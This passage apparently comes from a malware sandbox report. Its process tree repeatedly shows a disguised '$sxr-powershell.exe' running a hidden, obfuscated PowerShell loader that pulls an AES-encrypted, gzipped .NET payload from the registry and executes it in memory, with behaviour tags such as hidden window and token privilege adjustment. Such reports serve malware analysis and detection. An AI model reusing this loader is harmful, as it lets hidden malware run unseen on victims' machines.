'')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3348
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3424
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3316
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Hide Artifacts: Hidden Window
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:340
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = 